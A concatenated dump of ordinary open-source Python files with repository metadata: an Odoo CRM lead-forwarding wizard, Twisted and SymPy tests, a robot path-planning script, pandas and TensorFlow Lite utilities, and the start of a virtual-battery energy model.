'lead_link': self.get_lead_portal_url(cr, uid, lead.id, lead.type, context=context),
}
def default_get(self, cr, uid, fields, context=None):
if context is None:
context = {}
lead_obj = self.pool.get('crm.lead')
email_template_obj = self.pool.get('email.template')
try:
template_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'crm_partner_assign', 'email_template_lead_forward_mail')[1]
except ValueError:
template_id = False
res = super(crm_lead_forward_to_partner, self).default_get(cr, uid, fields, context=context)
active_ids = context.get('active_ids')
default_composition_mode = context.get('default_composition_mode')
res['assignation_lines'] = []
if template_id:
res['body'] = email_template_obj.get_email_template(cr, uid, template_id).body_html
if active_ids:
lead_ids = lead_obj.browse(cr, uid, active_ids, context=context)
if default_composition_mode == 'mass_mail':
partner_assigned_ids = lead_obj.search_geo_partner(cr, uid, active_ids, context=context)
else:
partner_assigned_ids = dict((lead.id, lead.partner_assigned_id and lead.partner_assigned_id.id or False) for lead in lead_ids)
res['partner_id'] = lead_ids[0].partner_assigned_id.id
for lead in lead_ids:
partner_id = partner_assigned_ids.get(lead.id) or False
partner = False
if partner_id:
partner = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context)
res['assignation_lines'].append(self._convert_to_assignation_line(cr, uid, lead, partner))
return res
def action_forward(self, cr, uid, ids, context=None):
lead_obj = self.pool.get('crm.lead')
record = self.browse(cr, uid, ids[0], context=context)
email_template_obj = self.pool.get('email.template')
try:
template_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'crm_partner_assign', 'email_template_lead_forward_mail')[1]
except ValueError:
raise osv.except_osv(_('Email Template Error'),
_('The Forward Email Template is not in the database'))
try:
portal_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'base', 'group_portal')[1]
except ValueError:
raise osv.except_osv(_('Portal Group Error'),
_('The Portal group cannot be found'))
local_context = context.copy()
if not (record.forward_type == 'single'):
no_email = set()
for lead in record.assignation_lines:
if lead.partner_assigned_id and not lead.partner_assigned_id.email:
no_email.add(lead.partner_assigned_id.name)
if no_email:
raise osv.except_osv(_('Email Error'),
('Set an email address for the partner(s): %s' % ", ".join(no_email)))
if record.forward_type == 'single' and not record.partner_id.email:
raise osv.except_osv(_('Email Error'),
('Set an email address for the partner %s' % record.partner_id.name))
partners_leads = {}
for lead in record.assignation_lines:
partner = record.forward_type == 'single' and record.partner_id or lead.partner_assigned_id
lead_details = {
'lead_link': lead.lead_link,
'lead_id': lead.lead_id,
}
if partner:
partner_leads = partners_leads.get(partner.id)
if partner_leads:
partner_leads['leads'].append(lead_details)
else:
partners_leads[partner.id] = {'partner': partner, 'leads': [lead_details]}
stage_id = False
if record.assignation_lines and record.assignation_lines[0].lead_id.type == 'lead':
try:
stage_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'crm_partner_assign', 'stage_portal_lead_assigned')[1]
except ValueError:
pass
for partner_id, partner_leads in partners_leads.items():
in_portal = False
for contact in (partner.child_ids or [partner]):
if contact.user_ids:
in_portal = portal_id in [g.id for g in contact.user_ids[0].groups_id]
local_context['partner_id'] = partner_leads['partner']
local_context['partner_leads'] = partner_leads['leads']
local_context['partner_in_portal'] = in_portal
email_template_obj.send_mail(cr, uid, template_id, ids[0], context=local_context)
lead_ids = [lead['lead_id'].id for lead in partner_leads['leads']]
values = {'partner_assigned_id': partner_id, 'user_id': partner_leads['partner'].user_id.id}
if stage_id:
values['stage_id'] = stage_id
if partner_leads['partner'].user_id:
values['section_id'] = partner_leads['partner'].user_id.default_section_id.id
lead_obj.write(cr, uid, lead_ids, values)
self.pool.get('crm.lead').message_subscribe(cr, uid, lead_ids, [partner_id], context=context)
return True
def get_lead_portal_url(self, cr, uid, lead_id, type, context=None):
action = type == 'opportunity' and 'action_portal_opportunities' or 'action_portal_leads'
try:
action_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'crm_partner_assign', action)[1]
except ValueError:
action_id = False
portal_link = "%s/?db=%s#id=%s&action=%s&view_type=form" % (self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url'), cr.dbname, lead_id, action_id)
return portal_link
def get_portal_url(self, cr, uid, ids, context=None):
portal_link = "%s/?db=%s" % (self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url'), cr.dbname)
return portal_link
_columns = {
'forward_type': fields.selection([('single', 'a single partner: manual selection of partner'), ('assigned', "several partners: automatic assignation, using GPS coordinates and partner's grades"), ], 'Forward selected leads to'),
'partner_id': fields.many2one('res.partner', 'Forward Leads To'),
'assignation_lines': fields.one2many('crm.lead.assignation', 'forward_id', 'Partner Assignation'),
'body': fields.html('Contents', help='Automatically sanitized HTML contents'),
}
_defaults = {
'forward_type': lambda self, cr, uid, c: c.get('forward_type') or 'single',
}
class crm_lead_assignation (osv.TransientModel):
_name = 'crm.lead.assignation'
_columns = {
'forward_id': fields.many2one('crm.lead.forward.to.partner', 'Partner Assignation'),
'lead_id': fields.many2one('crm.lead', 'Lead'),
'lead_location': fields.char('Lead Location', size=128),
'partner_assigned_id': fields.many2one('res.partner', 'Assigned Partner'),
'partner_location': fields.char('Partner Location', size=128),
'lead_link': fields.char('Lead Single Links', size=128),
}
def on_change_lead_id(self, cr, uid, ids, lead_id, context=None):
if not context:
context = {}
if not lead_id:
return {'value': {'lead_location': False}}
lead = self.pool.get('crm.lead').browse(cr, uid, lead_id, context=context)
lead_location = []
if lead.country_id:
lead_location.append(lead.country_id.name)
if lead.city:
lead_location.append(lead.city)
return {'value': {'lead_location': ", ".join(lead_location)}}
def on_change_partner_assigned_id(self, cr, uid, ids, partner_assigned_id, context=None):
if not context:
context = {}
if not partner_assigned_id:
return {'value': {'lead_location': False}}
partner = self.pool.get('res.partner').browse(cr, uid, partner_assigned_id, context=context)
partner_location = []
if partner.country_id:
partner_location.append(partner.country_id.name)
if partner.city:
partner_location.append(partner.city)
return {'value': {'partner_location': ", ".join(partner_location)}}
# # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
rockyzhang/zhangyanhit-python-for-android-mips | python-modules/twisted/twisted/test/test_abstract.py | 61 | 2546 | # Copyright (c) 2007 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for generic file descriptor based reactor support code.
"""
from twisted.trial.unittest import TestCase
from twisted.internet.abstract import isIPAddress
class AddressTests(TestCase):
"""
Tests for address-related functionality.
"""
def test_decimalDotted(self):
"""
L{isIPAddress} should return C{True} for any decimal dotted
representation of an IPv4 address.
"""
self.assertTrue(isIPAddress('0.1.2.3'))
self.assertTrue(isIPAddress('252.253.254.255'))
def test_shortDecimalDotted(self):
"""
L{isIPAddress} should return C{False} for a dotted decimal
representation with fewer or more than four octets.
"""
self.assertFalse(isIPAddress('0'))
self.assertFalse(isIPAddress('0.1'))
self.assertFalse(isIPAddress('0.1.2'))
self.assertFalse(isIPAddress('0.1.2.3.4'))
def test_invalidLetters(self):
"""
L{isIPAddress} should return C{False} for any non-decimal dotted
representation including letters.
"""
self.assertFalse(isIPAddress('a.2.3.4'))
self.assertFalse(isIPAddress('1.b.3.4'))
def test_invalidPunctuation(self):
"""
L{isIPAddress} should return C{False} for a string containing
strange punctuation.
"""
self.assertFalse(isIPAddress(','))
self.assertFalse(isIPAddress('1,2'))
self.assertFalse(isIPAddress('1,2,3'))
self.assertFalse(isIPAddress('1.,.3,4'))
def test_emptyString(self):
"""
L{isIPAddress} should return C{False} for the empty string.
"""
self.assertFalse(isIPAddress(''))
def test_invalidNegative(self):
"""
L{isIPAddress} should return C{False} for negative decimal values.
"""
self.assertFalse(isIPAddress('-1'))
self.assertFalse(isIPAddress('1.-2'))
self.assertFalse(isIPAddress('1.2.-3'))
self.assertFalse(isIPAddress('1.2.-3.4'))
def test_invalidPositive(self):
"""
L{isIPAddress} should return C{False} for a string containing
positive decimal values greater than 255.
"""
self.assertFalse(isIPAddress('256.0.0.0'))
self.assertFalse(isIPAddress('0.256.0.0'))
self.assertFalse(isIPAddress('0.0.256.0'))
self.assertFalse(isIPAddress('0.0.0.256'))
self.assertFalse(isIPAddress('256.256.256.256'))
| apache-2.0 |
mylene-campana/hpp-rbprm-corba | script/tests/hrp2_city1_path.py | 1 | 9565 | #/usr/bin/env python
# author: Mylene Campana ([email protected])
# Script which goes with hpp-rbprm-corba package.
# The script launches a skeleton-robot and a groundcrouch environment.
# It defines init and final configs, and solve them with RBPRM.
# Range Of Motions are spheres linked to the 4 end-effectors
#blender/urdf_to_blender.py -p rbprmBuilder/ -i /local/mcampana/devel/hpp/src/animals_description/urdf/skeleton.urdf -o skeleton_blend.py
from hpp.corbaserver import Client
from hpp.corbaserver.rbprm.problem_solver import ProblemSolver
from hpp.corbaserver.rbprm.rbprmbuilder import Builder
from hpp.gepetto import Viewer, PathPlayer
import math
from viewer_library import *
rootJointType = 'freeflyer'
packageName = 'hpp-rbprm-corba'
meshPackageName = 'hpp-rbprm-corba'
urdfName = 'hrp2_trunk_flexible'
urdfNameRoms = ['hrp2_lleg_rom','hrp2_rleg_rom']
urdfSuffix = ""
srdfSuffix = ""
ecsSize = 4
rbprmBuilder = Builder () # RBPRM
rbprmBuilder.loadModel(urdfName, urdfNameRoms, rootJointType, meshPackageName, packageName, urdfSuffix, srdfSuffix)
#rbprmBuilder.setJointBounds ("base_joint_xyz", [-140, 120, -80, 65, 1, 170])
rbprmBuilder.setJointBounds ("base_joint_xyz", [-140, 120, -80, 65, 10, 170])
rbprmBuilder.boundSO3([-0.2,0.2,-3.14,3.14,-0.3,0.3])
rbprmBuilder.setContactSize (0.03,0.08)
rbprmBuilder.client.basic.robot.setDimensionExtraConfigSpace(ecsSize)
rbprmBuilder.client.basic.robot.setExtraConfigSpaceBounds([0,0,0,0,0,0,-3.14,3.14])
ps = ProblemSolver (rbprmBuilder)
ps.client.problem.selectPathValidation("RbprmPathValidation",0.05) # also configValidation
ps.selectPathPlanner("BallisticPlanner") # "PRMplanner"#rbprmBuilder.setFullOrientationMode(True) # RB-shooter follow obstacle-normal orientation
rbprmBuilder.setFrictionCoef(1.2)
rbprmBuilder.setMaxTakeoffVelocity(30)#(8)
rbprmBuilder.setMaxLandingVelocity(30)
ps.client.problem.selectConFigurationShooter("RbprmShooter")
ps.client.problem.selectSteeringMethod("SteeringParabola")
rbprmBuilder.setNumberFilterMatch(0)
r = Viewer (ps); gui = r.client.gui
r(rbprmBuilder.getCurrentConfig ())
pp = PathPlayer (rbprmBuilder.client.basic, r)
r.loadObstacleModel ("iai_maps", "buildings_reduced", "buildings_reduced")
addLight (r, [-3,0,8,1,0,0,0], "li");
# Configs : [x, y, z, q1, q2, q3, q4, dir.x, dir.y, dir.z, theta]
q11 = rbprmBuilder.getCurrentConfig ()
q11[(len(q11)-4):]=[0,0,1,0] # set normal for init / goal config
# q11[0:7] = [16,45,100, 1, 0, 0, 0]; r(q11)# toit en X
#q11[0:7] = [0,27,72.3, 1, 0, 0, 0]; r(q11) # first roof of big tower
#q11[0:7] = [-100,45,0.4, 1, 0, 0, 0]; r(q11) # on floor
#q11[0:7] = [-105,20,29.4, 1, 0, 0, 0]; r(q11) # roof of house
#q11[0:7] = [55,60,0.3, 1, 0, 0, 0]; r(q11) # floor, right side
q11[0:7] = [-11.8,38.2,120.9, 1, 0, 0, 0]; r(q11) # highest tower
rbprmBuilder.isConfigValid(q11)
q22 = q11[::]
#q22[0:7] = [55,60,0.3, 1, 0, 0, 0]; r(q22) # floor, right side
#q22[0:7] = [-11.6,38.5,120.8, 1, 0, 0, 0]; r(q22) # highest tower
q22[0:7] = [16,45,100.5, 1, 0, 0, 0]; r(q22) #toit en X
#q22[0:7] = [-110,20,29.2, 1, 0, 0, 0]; r(q22) #house on left side
#q22[0:7] = [90,40,20.5, 1, 0, 0, 0]; r(q22) #right house
rbprmBuilder.isConfigValid(q22)
ps.clearRoadmap();
ps.setInitialConfig (q11); ps.addGoalConfig (q22)
#r.solveAndDisplay("rm",1,1)
## manually add way point (faster computation for test, work without but it's slow (~ <1minute )
"""
waypoints = [[20.075492263329966,
45.67270834760806,
100.0368335278786,
1,
0,
0,
0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0] ,
[4,
24,
72.36757488910698,
0.6025437481958323,
-0.014994289380592305,
0.36339178566529046,
-0.7103960957853586,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0],
[17.90089886471105,
20.51569231026736,
37.4,
0.9780744240181991,
-0.009709317338437355,
0.023538837001709934,
0.20669318660975794,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0]]
pbCl = rbprmBuilder.client.basic.problem
pbCl.addConfigToRoadmap (waypoints[0])
pbCl.addConfigToRoadmap (waypoints[1])
pbCl.addConfigToRoadmap (waypoints[2])
ps.directPath (q11, waypoints[0],True); pathIds0 = ps.numberPaths () - 1
ps.directPath (waypoints[0], waypoints[1],True); pathId01 = ps.numberPaths () - 1
ps.directPath (waypoints[1], waypoints[2],True); pathId12 = ps.numberPaths () - 1
ps.directPath (waypoints[2], q22,True); pathId2g = ps.numberPaths () - 1
pbCl.addEdgeToRoadmap (q11, waypoints[0], pathIds0, True)
pbCl.addEdgeToRoadmap (waypoints[0], waypoints[1], pathId01, True)
pbCl.addEdgeToRoadmap (waypoints[1], waypoints[2], pathId12, True)
pbCl.addEdgeToRoadmap (waypoints[2], q22, pathId2g, True)
##########
"""
t = ps.solve ()
solutionPathId = ps.numberPaths () - 1
pp.displayPath(solutionPathId, [0.0, 0.0, 0.8, 1.0])
rbprmBuilder.rotateAlongPath (solutionPathId,True)
orientedpathId = ps.numberPaths () - 1
#pp(orientedpathId)
r(pp.client.problem.configAtParam(orientedpathId,0))
V0list = rbprmBuilder.getsubPathsV0Vimp("V0",solutionPathId)
Vimplist = rbprmBuilder.getsubPathsV0Vimp("Vimp",solutionPathId)
print("Verify that all RB-waypoints are valid: ")
pathWaypoints = ps.getWaypoints(solutionPathId)
for i in range(1,len(pathWaypoints)-1):
if(not(rbprmBuilder.isConfigValid(pathWaypoints[i])[0])):
print('problem with waypoints number: ' + str(i))
#plotConeWaypoints (rbprmBuilder, solutionPathId, r, "cone_wp_group", "friction_cone_WP2")
#plotCone (q11, rbprmBuilder, r, "cone_11", "friction_cone2"); plotCone (q22, rbprmBuilder, r, "cone_21", "friction_cone2")
rob = rbprmBuilder.client.basic.robot
r(q11)
# Move RB-robot away in viewer
qAway = q11 [::]; qAway[2] = -5;
rbprmBuilder.setCurrentConfig (qAway); r(qAway)
## DEBUG tools ##
"""
cl.obstacle.getObstaclePosition('decor_base')
rbprmBuilder.isConfigValid(q1)
rbprmBuilder.setCurrentConfig(q1)
res=rbprmBuilder.distancesToCollision()
r( ps.configAtParam(0,5) )
ps.optimizePath (0)
ps.clearRoadmap ()
ps.resetGoalConfigs ()
from numpy import *
argmin(rbprmBuilder.distancesToCollision()[0])
rbprmBuilder.getJointNames ()
rbprmBuilder.getConfigSize ()
rbprmBuilder.client.rbprm.rbprm.isRbprmValid (q22)
r.client.gui.getNodeList()
rbprmBuilder.client.rbprm.rbprm.setRbShooter ()
q = rbprmBuilder.client.rbprm.rbprm.rbShoot ()
r(q)
rbprmBuilder.client.rbprm.rbprm.isRbprmValid (q)
rbprmBuilder.client.rbprm.rbprm.setRbShooter ()
r(rbprmBuilder.client.rbprm.rbprm.rbShoot ())
ps.client.problem.getResultValues ()
"""
## 3D viewer tools ##
"""
plotFrame (r, 'frame_group', [0,0,0], 0.6)
gui.removeFromGroup("path0",r.sceneName)
gui.getNodeList()
ps.numberNodes()
pathSamples = plotSampleSubPath (cl, r, pathId, 70, "path0", [0,0,1,1])
plotCone (q1, cl, r, "cone_first", "friction_cone_SG2"); plotCone (q2, cl, r, "cone_second", "friction_cone_SG2")
plotConeWaypoints (cl, pathId, r, "cone_wp_group", "friction_cone_WP2")
# Plot cones and edges in viewer
plotConesRoadmap (cl, r, 'cone_rm_group', "friction_cone2")
plotEdgesRoadmap (cl, r, 'edgeGroup', 70, [0,1,0.2,1])
gui = r.client.gui
gui.setCaptureTransform ("frames.yaml ", ["skeleton_trunk_flexible"])
q = q11
r (q); cl.rbprmBuilder.setCurrentConfig(q)
gui.refresh (); gui.captureTransform ()
gui.setVisibility('skeleton_trunk_flexible/thorax_rhand_rom',"OFF")
q = q_goal_test [0:7]
q[0] = q[0] + 1; q[2] = q[2] + 1
gui.addLight ("li", r.windowId, 0.0001, [0.9,0.9,0.9,1])
gui.addToGroup ("li", r.sceneName)
gui.applyConfiguration ("li", q)
gui.refresh ()
"""
## Export path to BLENDER ##
"""
import numpy as np
pathId = 0; dt = 0.05; gui.setCaptureTransform ("skeleton_trunk_path.yaml", ["skeleton_trunk_flexible"])
PL = ps.pathLength(pathId)
FrameRange = np.arange(0,PL,dt)
numberFrame = len(FrameRange)
# test frame capture
q = q11; r (q); gui.refresh (); gui.captureTransform ()
q = q22; r (q); gui.refresh (); gui.captureTransform ()
# capture path
for t in FrameRange:
q = ps.configAtParam (pathId, t)#update robot configuration
r (q); gui.refresh (); gui.captureTransform ()
r (q22); gui.refresh (); gui.captureTransform ()
"""
""" # Manually add waypoints to roadmap:
pbCl = rbprmBuilder.client.basic.problem
pbCl.addConfigToRoadmap (waypoints[0])
pbCl.addConfigToRoadmap (waypoints[1])
pbCl.addConfigToRoadmap (waypoints[2])
ps.directPath (q11, waypoints[0]); pathIds0 = ps.numberPaths () - 1
ps.directPath (waypoints[0], waypoints[1]); pathId01 = ps.numberPaths () - 1
ps.directPath (waypoints[1], waypoints[2]); pathId12 = ps.numberPaths () - 1
ps.directPath (waypoints[2], q22); pathId2g = ps.numberPaths () - 1
pbCl.addEdgeToRoadmap (q11, waypoints[0], pathIds0, True)
pbCl.addEdgeToRoadmap (waypoints[0], waypoints[1], pathId01, True)
pbCl.addEdgeToRoadmap (waypoints[1], waypoints[2], pathId12, True)
pbCl.addEdgeToRoadmap (waypoints[2], q22, pathId2g, True)
pbCl.saveRoadmap ('/local/mcampana/devel/hpp/data/skeleton_test_path.rdm')
ps.readRoadmap ('/local/mcampana/devel/hpp/data/skeleton_test_path.rdm')
"""
""" #### display
id = r.client.gui.getWindowID("window_hpp_")
r.client.gui.attachCameraToNode("spiderman_trunk/base_link",id)
ps.clearRoadmap()
gui.removeFromGroup("path_1_root",r.sceneName)
ps.solve()
solutionPathId = ps.numberPaths () - 1
pp.displayPath(solutionPathId, [0.0, 0.0, 0.8, 1.0])
rbprmBuilder.rotateAlongPath (solutionPathId)
orientedpathId = ps.numberPaths () - 1
r(pp.client.problem.configAtParam(orientedpathId,0))
pp(orientedpathId)
q11 = ps.node(0)
q22 = ps.node(1)
plotCone (q11, ps, r, "cone_first", "friction_cone_SG2");
plotCone (q22, ps, r, "cone_second", "friction_cone_SG2")
"""
| lgpl-3.0 |
Weihonghao/ECM | Vpy34/lib/python3.5/site-packages/pandas/compat/numpy/__init__.py | 3 | 2213 | """ support numpy compatiblitiy across versions """
import re
import numpy as np
from distutils.version import LooseVersion
from pandas.compat import string_types, string_and_binary_types
# numpy versioning
_np_version = np.__version__
_nlv = LooseVersion(_np_version)
_np_version_under1p8 = _nlv < '1.8'
_np_version_under1p9 = _nlv < '1.9'
_np_version_under1p10 = _nlv < '1.10'
_np_version_under1p11 = _nlv < '1.11'
_np_version_under1p12 = _nlv < '1.12'
_np_version_under1p13 = _nlv < '1.13'
if _nlv < '1.7.0':
raise ImportError('this version of pandas is incompatible with '
'numpy < 1.7.0\n'
'your numpy version is {0}.\n'
'Please upgrade numpy to >= 1.7.0 to use '
'this pandas version'.format(_np_version))
_tz_regex = re.compile('[+-]0000$')
def tz_replacer(s):
if isinstance(s, string_types):
if s.endswith('Z'):
s = s[:-1]
elif _tz_regex.search(s):
s = s[:-5]
return s
def np_datetime64_compat(s, *args, **kwargs):
"""
provide compat for construction of strings to numpy datetime64's with
tz-changes in 1.11 that make '2015-01-01 09:00:00Z' show a deprecation
warning, when need to pass '2015-01-01 09:00:00'
"""
if not _np_version_under1p11:
s = tz_replacer(s)
return np.datetime64(s, *args, **kwargs)
def np_array_datetime64_compat(arr, *args, **kwargs):
"""
provide compat for construction of an array of strings to a
np.array(..., dtype=np.datetime64(..))
tz-changes in 1.11 that make '2015-01-01 09:00:00Z' show a deprecation
warning, when need to pass '2015-01-01 09:00:00'
"""
if not _np_version_under1p11:
# is_list_like
if hasattr(arr, '__iter__') and not \
isinstance(arr, string_and_binary_types):
arr = [tz_replacer(s) for s in arr]
else:
arr = tz_replacer(arr)
return np.array(arr, *args, **kwargs)
__all__ = ['np',
'_np_version_under1p8',
'_np_version_under1p9',
'_np_version_under1p10',
'_np_version_under1p11',
'_np_version_under1p12',
]
| agpl-3.0 |
bukzor/sympy | sympy/matrices/expressions/tests/test_trace.py | 83 | 2693 | from sympy.core import Lambda, S, symbols
from sympy.concrete import Sum
from sympy.functions import adjoint, conjugate, transpose
from sympy.matrices import eye, Matrix, ShapeError, ImmutableMatrix
from sympy.matrices.expressions import (
Adjoint, Identity, FunctionMatrix, MatrixExpr, MatrixSymbol, Trace,
ZeroMatrix, trace, MatPow, MatAdd, MatMul
)
from sympy.utilities.pytest import raises, XFAIL
n = symbols('n', integer=True)
A = MatrixSymbol('A', n, n)
B = MatrixSymbol('B', n, n)
C = MatrixSymbol('C', 3, 4)
def test_Trace():
assert isinstance(Trace(A), Trace)
assert not isinstance(Trace(A), MatrixExpr)
raises(ShapeError, lambda: Trace(C))
assert trace(eye(3)) == 3
assert trace(Matrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 9])) == 15
assert adjoint(Trace(A)) == trace(Adjoint(A))
assert conjugate(Trace(A)) == trace(Adjoint(A))
assert transpose(Trace(A)) == Trace(A)
A / Trace(A) # Make sure this is possible
# Some easy simplifications
assert trace(Identity(5)) == 5
assert trace(ZeroMatrix(5, 5)) == 0
assert trace(2*A*B) == 2*Trace(A*B)
assert trace(A.T) == trace(A)
i, j = symbols('i j')
F = FunctionMatrix(3, 3, Lambda((i, j), i + j))
assert trace(F) == (0 + 0) + (1 + 1) + (2 + 2)
raises(TypeError, lambda: Trace(S.One))
assert Trace(A).arg is A
assert str(trace(A)) == str(Trace(A).doit())
def test_Trace_A_plus_B():
assert trace(A + B) == Trace(A) + Trace(B)
assert Trace(A + B).arg == MatAdd(A, B)
assert Trace(A + B).doit() == Trace(A) + Trace(B)
def test_Trace_MatAdd_doit():
# See issue #9028
X = ImmutableMatrix([[1, 2, 3]]*3)
Y = MatrixSymbol('Y', 3, 3)
q = MatAdd(X, 2*X, Y, -3*Y)
assert Trace(q).arg == q
assert Trace(q).doit() == 18 - 2*Trace(Y)
def test_Trace_MatPow_doit():
X = Matrix([[1, 2], [3, 4]])
assert Trace(X).doit() == 5
q = MatPow(X, 2)
assert Trace(q).arg == q
assert Trace(q).doit() == 29
def test_Trace_MutableMatrix_plus():
# See issue #9043
X = Matrix([[1, 2], [3, 4]])
assert Trace(X) + Trace(X) == 2*Trace(X)
def test_Trace_doit_deep_False():
X = Matrix([[1, 2], [3, 4]])
q = MatPow(X, 2)
assert Trace(q).doit(deep=False).arg == q
q = MatAdd(X, 2*X)
assert Trace(q).doit(deep=False).arg == q
q = MatMul(X, 2*X)
assert Trace(q).doit(deep=False).arg == q
def test_trace_constant_factor():
# Issue 9052: gave 2*Trace(MatMul(A)) instead of 2*Trace(A)
assert trace(2*A) == 2*Trace(A)
X = ImmutableMatrix([[1, 2], [3, 4]])
assert trace(MatMul(2, X)) == 10
@XFAIL
def test_rewrite():
assert isinstance(trace(A).rewrite(Sum), Sum)
| bsd-3-clause |
adit-chandra/tensorflow | tensorflow/lite/testing/op_tests/tile.py | 4 | 2453 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test configs for tile."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
@register_make_test_function()
def make_tile_tests(options):
"""Make a set of tests to do tile."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.bool],
"input_shape": [[3, 2, 1], [2, 2, 2]],
"multiplier_dtype": [tf.int32, tf.int64],
"multiplier_shape": [[3]]
}]
def build_graph(parameters):
"""Build the tile op testing graph."""
input_value = tf.compat.v1.placeholder(
dtype=parameters["input_dtype"],
shape=parameters["input_shape"],
name="input")
multiplier_value = tf.compat.v1.placeholder(
dtype=parameters["multiplier_dtype"],
shape=parameters["multiplier_shape"],
name="multiplier")
out = tf.tile(input_value, multiplier_value)
return [input_value, multiplier_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
multipliers_value = create_tensor_data(
parameters["multiplier_dtype"],
parameters["multiplier_shape"],
min_value=0)
return [input_value, multipliers_value], sess.run(
outputs,
feed_dict={
inputs[0]: input_value,
inputs[1]: multipliers_value
})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
| apache-2.0 |
dpinney/omf | omf/solvers/VB.py | 1 | 29740 | import pandas as pd
import pulp
import numpy as np
from numpy import *
class VirtualBattery(object):
""" Base class for abstraction. """
def __init__(self, ambient_temp, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number):
# C :thermal capacitance
# R : thermal resistance
# P: rated power (kW) of each TCL
# eta: COP
# delta: temperature deadband
# theta_s: temperature setpoint
# N: number of TCL
# ambient: ambient temperature
self.ambient = ambient_temp
self.C = capacitance
self.R = resistance
self.P = rated_power
self.eta = COP
self.delta = deadband
self.theta_s = setpoint
self.N = tcl_number
def generate(self, participation_number, P0_number):
""" Main calculation happens here. """
#heuristic function of participation
atan = np.arctan
participation = participation_number
P0 = P0_number
P0[P0 < 0] = 0.0 # set negative power consumption to 0
p_lower = self.N*participation*P0 # aggregated baseline power consumption considering participation
p_upper = self.N*participation*(self.P - P0)
p_upper[p_upper < 0] = 0.0 # set negative power upper bound to 0
e_ul = self.N*participation*self.C*self.delta/2/self.eta
return p_lower, p_upper, e_ul
class AC(VirtualBattery):
""" Derived Class for specifically AC Virtual Battery. """
def __init__(self, theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number):
super(AC, self).__init__(theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number)
# self.tcl_idx = tcl_idx
self.theta_a = self.ambient # theta_a == ambient temperature
def generate(self):
#heuristic function of participation
atan = np.arctan
# participation for AC
Ta = np.linspace(20, 45, num=51)
participation = (atan(self.theta_a-27) - atan(Ta[0]-27))/((atan(Ta[-1]-27) - atan(Ta[0]-27)))
participation = np.clip(participation, 0, 1)
#P0 for AC
P0 = (self.theta_a - self.theta_s)/self.R/self.eta # average baseline power consumption for the given temperature setpoint
return super(AC, self).generate(participation, P0)
class HP(VirtualBattery):
""" Derived Class for specifically HP Virtual Battery. """
def __init__(self, theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number):
super(HP, self).__init__(theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number)
# self.tcl_idx = tcl_idx
self.theta_a = self.ambient # theta_a == ambient temperature
def generate(self):
#heuristic function of participation
atan = np.arctan
# participation for HP
Ta = np.linspace(0, 25, num=51)
participation = 1-(atan(self.theta_a-10) - atan(Ta[0]-10))/((atan(Ta[-1]-10) - atan(Ta[0]-10)))
participation = np.clip(participation, 0, 1)
#P0 for HP
P0 = (self.theta_s - self.theta_a)/self.R/self.eta
return super(HP, self).generate(participation, P0)
class RG(VirtualBattery):
""" Derived Class for specifically RG Virtual Battery. """
def __init__(self, theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number):
super(RG, self).__init__(theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number)
# self.tcl_idx = tcl_idx
self.theta_a = self.ambient # theta_a == ambient temperature
def generate(self):
#heuristic function of participation
atan = np.arctan
# participation for RG
participation = np.ones(self.theta_a.shape)
participation = np.clip(participation, 0, 1)
#P0 for RG
P0 = (self.theta_a - self.theta_s)/self.R/self.eta # average baseline power consumption for the given temperature setpoint
return super(RG, self).generate(participation, P0)
class WH(VirtualBattery):
""" Derived class for specifically Water Heater Virtual Battery. """
N_wh = 50
def __init__(self, theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number,Tout, water):
super(WH, self).__init__(theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number)
self.C_wh = self.C*np.ones((self.N_wh, 1)) # thermal capacitance, set in parent class
self.R_wh = self.R*np.ones((self.N_wh, 1)) # thermal resistance
self.P_wh = self.P*np.ones((self.N_wh, 1)) # rated power (kW) of each TCL
self.delta_wh = self.delta*np.ones((self.N_wh, 1)) # temperature deadband
self.theta_s_wh = self.theta_s*np.ones((self.N_wh, 1)) # temperature setpoint
self.Tout=Tout
self.water = water
# self.N = self.para[6] # number of TCL
def calculate_twat(self,tout_avg,tout_madif):
tout_avg=tout_avg/5*9+32
tout_madif=tout_madif/5*9
ratio = 0.4 + 0.01 * (tout_avg - 44)
lag = 35 - 1.0 * (tout_avg - 44)
twat = 1*np.ones((365*24*60,1))
for i in range(365):
for j in range(60*24):
